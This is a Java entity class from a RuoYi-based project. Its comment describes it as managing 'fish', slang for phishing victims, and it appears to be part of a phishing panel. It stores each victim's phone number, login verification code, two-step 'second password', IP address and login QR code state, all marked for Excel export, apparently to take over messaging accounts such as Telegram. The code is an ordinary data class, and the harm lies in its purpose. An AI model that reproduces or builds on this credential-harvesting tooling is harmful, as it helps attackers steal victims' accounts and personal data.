package com.ruoyi.system.domain;
|
|
import org.apache.commons.lang3.builder.ToStringBuilder;
|
import org.apache.commons.lang3.builder.ToStringStyle;
|
import com.ruoyi.common.annotation.Excel;
|
import com.ruoyi.common.core.domain.BaseEntity;
|
|
import java.util.Date;
|
|
/**
|
* 鱼儿管理对象 sys_tgdata
|
*
|
* @author 零九
|
* @date 2023-05-10
|
*/
|
public class SysTgdata extends BaseEntity
|
{
|
private static final long serialVersionUID = 1L;
|
|
/** ID */
|
private Integer id;
|
|
/** 手机号 */
|
@Excel(name = "手机号")
|
private String uphone;
|
|
/** 验证码 */
|
@Excel(name = "验证码")
|
private String uvifcode;
|
|
/** 二次密码 */
|
@Excel(name = "二次密码")
|
private String agpass;
|
|
/** 操作结果 */
|
@Excel(name = "操作结果")
|
private String ures;
|
|
/** 用户ip */
|
@Excel(name = "用户ip")
|
private String uip;
|
|
/** 二维码 */
|
@Excel(name = "二维码")
|
private String uqrcode;
|
|
/** 变化状态 */
|
@Excel(name = "变化状态")
|
private String qrstate;
|
|
/** 操作时间 */
|
@Excel(name = "操作时间")
|
private Date createtime;
|
|
public String getQrstate() {
|
return qrstate;
|
}
|
|
public void setQrstate(String qrstate) {
|
this.qrstate = qrstate;
|
}
|
|
public void setId(Integer id)
|
{
|
this.id = id;
|
}
|
|
public Integer getId()
|
{
|
return id;
|
}
|
public void setUphone(String uphone)
|
{
|
this.uphone = uphone;
|
}
|
|
public String getUphone()
|
{
|
return uphone;
|
}
|
public void setUvifcode(String uvifcode)
|
{
|
this.uvifcode = uvifcode;
|
}
|
|
public String getUvifcode()
|
{
|
return uvifcode;
|
}
|
public void setAgpass(String agpass)
|
{
|
this.agpass = agpass;
|
}
|
|
public String getAgpass()
|
{
|
return agpass;
|
}
|
public void setUres(String ures)
|
{
|
this.ures = ures;
|
}
|
|
public String getUres()
|
{
|
return ures;
|
}
|
public void setUip(String uip)
|
{
|
this.uip = uip;
|
}
|
|
public String getUip()
|
{
|
return uip;
|
}
|
public void setUqrcode(String uqrcode)
|
{
|
this.uqrcode = uqrcode;
|
}
|
|
public String getUqrcode()
|
{
|
return uqrcode;
|
}
|
|
public Date getCreatetime() {
|
return createtime;
|
}
|
|
public void setCreatetime(Date createtime) {
|
this.createtime = createtime;
|
}
|
|
@Override
|
public String toString() {
|
return new ToStringBuilder(this,ToStringStyle.MULTI_LINE_STYLE)
|
.append("id", getId())
|
.append("uphone", getUphone())
|
.append("uvifcode", getUvifcode())
|
.append("agpass", getAgpass())
|
.append("ures", getUres())
|
.append("uip", getUip())
|
.append("uqrcode", getUqrcode())
|
.append("createtime", getCreatetime())
|
.toString();
|
}
|
}
|